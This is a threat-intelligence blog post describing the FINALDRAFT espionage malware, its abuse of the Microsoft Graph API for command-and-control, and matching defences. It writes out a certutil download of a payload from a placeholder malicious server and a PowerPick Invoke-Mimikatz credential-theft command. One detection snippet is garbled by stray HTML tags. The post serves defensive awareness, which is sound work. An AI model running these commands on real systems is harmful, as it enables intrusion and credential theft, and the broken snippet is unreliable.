Listen to this Post
2025-02-14
Threat hunters have uncovered a sophisticated malware campaign targeting a South American nation’s foreign ministry, leveraging the Microsoft Graph API for espionage. The malware, named FINALDRAFT, is a remote administration tool written in C++ and is capable of executing encrypted shellcode, injecting it into processes like “mspaint.exe,” and abusing the Outlook email service for command-and-control (C2) operations.
The attackers used Microsoft’s `certutil` application to download additional payloads from a web server associated with the Foreign Ministry. The commands were executed via the Windows Remote Management’s Remote Shell plugin (WinrsHost.exe), indicating lateral movement from a previously compromised host.
Key Commands and Techniques:
1. Certutil for Payload Download:
certutil -urlcache -split -f http://malicious-server/payload.exe C:\path\to\payload.exe
This command downloads the malicious payload from an external server.
2. Process Injection with FINALDRAFT:
The malware injects shellcode into a newly spawned `mspaint.exe` process, evading detection by using legitimate processes.
3. Microsoft Graph API Abuse:
FINALDRAFT uses the Microsoft Graph API to parse commands stored in the mailbox’s drafts folder and writes execution results into new draft emails. This technique allows the malware to communicate with the C2 server stealthily.
4. PowerPick for Evasion:
Instead of invoking powershell.exe, FINALDRAFT patches APIs to evade Event Tracing for Windows (ETW) and uses PowerPick, a utility from the Empire post-exploitation toolkit, to execute PowerShell commands:
PowerPick -Command "Invoke-Mimikatz"
5. NTLM Hash Theft:
The malware can start new processes using stolen NTLM hashes, enabling lateral movement within the network.
Practice-Verified Commands:
- Detecting Certutil Abuse:
Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" | Where-Object { $_.Message -like "*certutil*" }This command helps identify suspicious `certutil` usage in Windows event logs.
-
Monitoring Process Injection:
Get-Process | Where-Object { $<em>.ProcessName -eq "mspaint.exe" -and $</em>.Modules.ModuleName -contains "suspicious.dll" }Use this to detect unusual DLLs injected into legitimate processes.
-
Blocking Microsoft Graph API Abuse:
Configure Azure AD Conditional Access policies to restrict access to the Graph API from untrusted IPs.
What Undercode Say:
The FINALDRAFT malware campaign highlights the evolving sophistication of cyber espionage tools, particularly in their ability to abuse legitimate services like the Microsoft Graph API for stealthy command-and-control operations. The use of `certutil` for payload delivery and PowerPick for evasion underscores the importance of monitoring and securing administrative tools and PowerShell usage in enterprise environments.
To mitigate such threats, organizations should:
- Regularly audit and restrict the use of tools like `certutil` and
WinrsHost.exe. - Implement robust endpoint detection and response (EDR) solutions to monitor process injection and lateral movement.
- Use Azure AD Conditional Access to limit Graph API access to trusted devices and locations.
- Enable ETW and Sysmon logging to detect API patching and other evasion techniques.
- Educate employees on phishing and social engineering tactics to reduce the risk of initial compromise.
For further reading on securing Microsoft Graph API and detecting FINALDRAFT-like threats, refer to:
– Microsoft Graph API Security Best Practices
– Elastic Security Labs Report on REF7707
By adopting a proactive approach to threat hunting and leveraging advanced detection mechanisms, organizations can significantly reduce their exposure to such advanced persistent threats (APTs).
References:
Hackers Feeds, Undercode AI
